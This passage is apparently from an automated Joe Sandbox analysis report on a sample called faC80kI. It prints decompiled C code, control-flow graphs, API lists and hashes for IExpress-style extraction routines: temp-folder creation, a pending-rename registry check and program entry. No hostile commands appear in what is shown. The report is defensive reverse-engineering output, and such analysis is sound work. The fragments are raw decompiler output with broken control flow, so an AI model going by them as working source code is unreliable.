                                                                                                                                                                                                                                              • Part of subcall function 00A953A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9542B
                                                                                                                                                                                                                                              • Part of subcall function 00A953A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95434
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                            • API String ID: 1979080616-3696344869
                                                                                                                                                                                                                                            • Opcode ID: 019e83e2a9e843aaae6e1ba322b291924334c12233786091af219ae4b2bd76dc
                                                                                                                                                                                                                                            • Instruction ID: 1a5339ee3879f4dccc142557a0bca129dfbf39e2eeaa8835f2345baf5bd5391e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 019e83e2a9e843aaae6e1ba322b291924334c12233786091af219ae4b2bd76dc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68313571F00A01ABCF16AFB99D4697F73EBBB85340F16012BA906DA552DF70CE028785
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 519 a9256d-a9257d 520 a92583-a92589 519->520 521 a92622-a92627 call a924e0 519->521 523 a925e8-a92607 RegOpenKeyExA 520->523 524 a9258b 520->524 528 a92629-a9262f 521->528 525 a92609-a92620 RegQueryInfoKeyA 523->525 526 a925e3-a925e6 523->526 524->528 529 a92591-a92595 524->529 530 a925d1-a925dd RegCloseKey 525->530 526->528 529->528 531 a9259b-a925ba RegOpenKeyExA 529->531 530->526 531->526 532 a925bc-a925cb RegQueryValueExA 531->532 532->530
                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A9256D(signed int __ecx) {
                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                            				int _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t31 = E00A924E0(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t34 = _t13 - 1;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                            						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                            							_v8 = 0;
                                                                                                                                                                                                                                            							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                            							if(_t24 == 0) {
                                                                                                                                                                                                                                            								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                            								L6:
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                            								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							_t31 = _v8;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00A94096,00A94096,?,00A91ED3,00000001,00000000,?,?,00A94137,?), ref: 00A925B2
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A94096,?,00A91ED3,00000001,00000000,?,?,00A94137,?,00A94096), ref: 00A925CB
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,00A91ED3,00000001,00000000,?,?,00A94137,?,00A94096), ref: 00A925DD
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00A94096,00A94096,?,00A91ED3,00000001,00000000,?,?,00A94137,?), ref: 00A925FF
                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A94096,00000000,00000000,00000000,00000000,?,00A91ED3,00000001,00000000), ref: 00A9261A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 00A925A8
                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 00A925C3
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A925F5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                            • Opcode ID: 27dc128831f1b6fded482514d9a9a9a0e890d1ee6d49d909b44c7e3342f3a608
                                                                                                                                                                                                                                            • Instruction ID: 54a709df246bd31059a5b962e9fe98f772d57d76fb340c7e627776cedc40e960
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27dc128831f1b6fded482514d9a9a9a0e890d1ee6d49d909b44c7e3342f3a608
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F114F35B42228BBAF20DB919C09EFBBEFCEF567A1F104056B909E2011DA345E45D7E1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 533 a96a60-a96a91 call a97155 call a97208 GetStartupInfoW 539 a96a93-a96aa2 533->539 540 a96abc-a96abe 539->540 541 a96aa4-a96aa6 539->541 544 a96abf-a96ac5 540->544 542 a96aa8-a96aad 541->542 543 a96aaf-a96aba Sleep 541->543 542->544 543->539 545 a96ad1-a96ad7 544->545 546 a96ac7-a96acf _amsg_exit 544->546 548 a96ad9-a96ae9 call a96c3f 545->548 549 a96b05 545->549 547 a96b0b-a96b11 546->547 550 a96b2e-a96b30 547->550 551 a96b13-a96b24 _initterm 547->551 555 a96aee-a96af2 548->555 549->547 553 a96b3b-a96b42 550->553 554 a96b32-a96b39 550->554 551->550 556 a96b44-a96b51 call a97060 553->556 557 a96b67-a96b71 553->557 554->553 555->547 558 a96af4-a96b00 555->558 556->557 566 a96b53-a96b65 556->566 560 a96b74-a96b79 557->560 561 a96c39-a96c3e call a9724d 558->561 564 a96b7b-a96b7d 560->564 565 a96bc5-a96bc8 560->565 570 a96b7f-a96b81 564->570 571 a96b94-a96b98 564->571 568 a96bca-a96bd3 565->568 569 a96bd6-a96be3 _ismbblead 565->569 566->557 568->569 575 a96be9-a96bed 569->575 576 a96be5-a96be6 569->576 570->565 572 a96b83-a96b85 570->572 573 a96b9a-a96b9e 571->573 574 a96ba0-a96ba2 571->574 572->571 577 a96b87-a96b8a 572->577 578 a96ba3-a96bbc call a92bfb 573->578 574->578 575->560 580 a96c1e-a96c25 575->580 576->575 577->571 581 a96b8c-a96b92 577->581 578->580 586 a96bbe-a96bbf exit 578->586 582 a96c32 580->582 583 a96c27-a96c2d _cexit 580->583 581->572 582->561 583->582 586->565
                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                            			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int* _t25;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed char _t41;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				E00A97155();
                                                                                                                                                                                                                                            				_push(0x58);
                                                                                                                                                                                                                                            				_push(0xa972b8);
                                                                                                                                                                                                                                            				E00A97208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                            				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                            				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                            				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                            				_t53 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                            					if(0 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(0 != _t56) {
                                                                                                                                                                                                                                            						Sleep(0x3e8);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t58 = 1;
                                                                                                                                                                                                                                            						_t53 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_t67 =  *0xa988b0 - _t58; // 0x2
                                                                                                                                                                                                                                            					if(_t67 != 0) {
                                                                                                                                                                                                                                            						__eflags =  *0xa988b0; // 0x2
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							 *0xa981e4 = _t58;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0xa988b0 = _t58;
                                                                                                                                                                                                                                            							_t37 = E00A96C3F(0xa910b8, 0xa910c4); // executed
                                                                                                                                                                                                                                            							__eflags = _t37;
                                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                                            								goto L13;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            								_t30 = 0xff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(0x1f);
                                                                                                                                                                                                                                            						L00A96FF4();
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t68 =  *0xa988b0 - _t58; // 0x2
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_push(0xa910b4);
                                                                                                                                                                                                                                            							_push(0xa910ac);
                                                                                                                                                                                                                                            							L00A97202();
                                                                                                                                                                                                                                            							 *0xa988b0 = 2;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(_t53 == 0) {
                                                                                                                                                                                                                                            							 *0xa988ac = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t71 =  *0xa988b4;
                                                                                                                                                                                                                                            						if( *0xa988b4 != 0 && E00A97060(_t71, 0xa988b4) != 0) {
                                                                                                                                                                                                                                            							_t60 =  *0xa988b4; // 0x0
                                                                                                                                                                                                                                            							 *0xa9a288(0, 2, 0);
                                                                                                                                                                                                                                            							 *_t60();
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                                                            						_t59 =  *_t25;
                                                                                                                                                                                                                                            						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t41 =  *_t59;
                                                                                                                                                                                                                                            							if(_t41 > 0x20) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(_t41 != 0) {
                                                                                                                                                                                                                                            								if(_t54 != 0) {
                                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                            										_t59 = _t59 + 1;
                                                                                                                                                                                                                                            										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            										_t41 =  *_t59;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                            							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t29 = 0xa;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(_t29);
                                                                                                                                                                                                                                            							_t30 = E00A92BFB(0xa90000, 0, _t59); // executed
                                                                                                                                                                                                                                            							 *0xa981e0 = _t30;
                                                                                                                                                                                                                                            							__eflags =  *0xa981f8;
                                                                                                                                                                                                                                            							if( *0xa981f8 == 0) {
                                                                                                                                                                                                                                            								exit(_t30); // executed
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *0xa981e4;
                                                                                                                                                                                                                                            							if( *0xa981e4 == 0) {
                                                                                                                                                                                                                                            								__imp___cexit();
                                                                                                                                                                                                                                            								_t30 =  *0xa981e0; // 0x0
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            							goto L40;
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                            							if(_t41 == 0x22) {
                                                                                                                                                                                                                                            								__eflags = _t54;
                                                                                                                                                                                                                                            								_t15 = _t54 == 0;
                                                                                                                                                                                                                                            								__eflags = _t15;
                                                                                                                                                                                                                                            								_t54 = 0 | _t15;
                                                                                                                                                                                                                                            								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                            							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                            							__eflags = _t26;
                                                                                                                                                                                                                                            							if(_t26 != 0) {
                                                                                                                                                                                                                                            								_t59 = _t59 + 1;
                                                                                                                                                                                                                                            								__eflags = _t59;
                                                                                                                                                                                                                                            								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t59 = _t59 + 1;
                                                                                                                                                                                                                                            							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L40:
                                                                                                                                                                                                                                            					return E00A9724D(_t30);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                                                                                            				__eflags = 1;
                                                                                                                                                                                                                                            				goto L7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a96b94
                                                                                                                                                                                                                                            0x00a96b98
                                                                                                                                                                                                                                            0x00a96ba2
                                                                                                                                                                                                                                            0x00a96b9a
                                                                                                                                                                                                                                            0x00a96b9a
                                                                                                                                                                                                                                            0x00a96b9a
                                                                                                                                                                                                                                            0x00a96ba3
                                                                                                                                                                                                                                            0x00a96bab
                                                                                                                                                                                                                                            0x00a96bb0
                                                                                                                                                                                                                                            0x00a96bb5
                                                                                                                                                                                                                                            0x00a96bbc
                                                                                                                                                                                                                                            0x00a96bbf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96bbf
                                                                                                                                                                                                                                            0x00a96c1e
                                                                                                                                                                                                                                            0x00a96c25
                                                                                                                                                                                                                                            0x00a96c27
                                                                                                                                                                                                                                            0x00a96c2d
                                                                                                                                                                                                                                            0x00a96c2d
                                                                                                                                                                                                                                            0x00a96c32
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96bc5
                                                                                                                                                                                                                                            0x00a96bc5
                                                                                                                                                                                                                                            0x00a96bc8
                                                                                                                                                                                                                                            0x00a96bcc
                                                                                                                                                                                                                                            0x00a96bce
                                                                                                                                                                                                                                            0x00a96bce
                                                                                                                                                                                                                                            0x00a96bd1
                                                                                                                                                                                                                                            0x00a96bd3
                                                                                                                                                                                                                                            0x00a96bd3
                                                                                                                                                                                                                                            0x00a96bd6
                                                                                                                                                                                                                                            0x00a96bda
                                                                                                                                                                                                                                            0x00a96be1
                                                                                                                                                                                                                                            0x00a96be3
                                                                                                                                                                                                                                            0x00a96be5
                                                                                                                                                                                                                                            0x00a96be5
                                                                                                                                                                                                                                            0x00a96be6
                                                                                                                                                                                                                                            0x00a96be6
                                                                                                                                                                                                                                            0x00a96be9
                                                                                                                                                                                                                                            0x00a96bea
                                                                                                                                                                                                                                            0x00a96bea
                                                                                                                                                                                                                                            0x00a96b74
                                                                                                                                                                                                                                            0x00a96c39
                                                                                                                                                                                                                                            0x00a96c3e
                                                                                                                                                                                                                                            0x00a96c3e
                                                                                                                                                                                                                                            0x00a96abe
                                                                                                                                                                                                                                            0x00a96abe
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A97155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A97182
                                                                                                                                                                                                                                              • Part of subcall function 00A97155: GetCurrentProcessId.KERNEL32 ref: 00A97191
                                                                                                                                                                                                                                              • Part of subcall function 00A97155: GetCurrentThreadId.KERNEL32 ref: 00A9719A
                                                                                                                                                                                                                                              • Part of subcall function 00A97155: GetTickCount.KERNEL32 ref: 00A971A3
                                                                                                                                                                                                                                              • Part of subcall function 00A97155: QueryPerformanceCounter.KERNEL32(?), ref: 00A971B8
                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,00A972B8,00000058), ref: 00A96A7F
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00A96AB4
                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 00A96AC9
                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 00A96B1D
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00A96B49
                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 00A96BBF
                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 00A96BDA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                            • Opcode ID: 0d190c5f7c09f693ec3dc25e9426cd619951a062ef5689110669add2940c30f1
                                                                                                                                                                                                                                            • Instruction ID: 8468f1fb4b00f8bc32ff58e64bbdb3b1cc3b45e0c69e0036a57ca973261bc289
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d190c5f7c09f693ec3dc25e9426cd619951a062ef5689110669add2940c30f1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2341E031B942259BDF21DBA8D9157AA77F4FF457A0F24411BE841E7290EF7848428BA0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 587 a958c8-a958d5 588 a958d8-a958dd 587->588 588->588 589 a958df-a958f1 LocalAlloc 588->589 590 a95919-a95959 call a91680 call a9658a CreateFileA LocalFree 589->590 591 a958f3-a95901 call a944b9 589->591 595 a95906-a95910 call a96285 590->595 601 a9595b-a9596c CloseHandle GetFileAttributesA 590->601 591->595 600 a95912-a95918 595->600 601->595 602 a9596e-a95970 601->602 602->595 603 a95972-a9597b 602->603 603->600
                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A958C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				signed char _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                                                                                            				CHAR* _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                                                                                            				_t23 = __ecx + 1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t6 =  *_t27;
                                                                                                                                                                                                                                            					_t27 = _t27 + 1;
                                                                                                                                                                                                                                            				} while (_t6 != 0);
                                                                                                                                                                                                                                            				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                            				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                            				if(_t20 != 0) {
                                                                                                                                                                                                                                            					E00A91680(_t20, _t36, _t33);
                                                                                                                                                                                                                                            					E00A9658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                            					_v8 = _t10;
                                                                                                                                                                                                                                            					LocalFree(_t20);
                                                                                                                                                                                                                                            					_t12 = _v8;
                                                                                                                                                                                                                                            					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						CloseHandle(_t12);
                                                                                                                                                                                                                                            						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0xa99124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            					_t14 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A958E7
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95943
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9594D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9595C
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95963
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
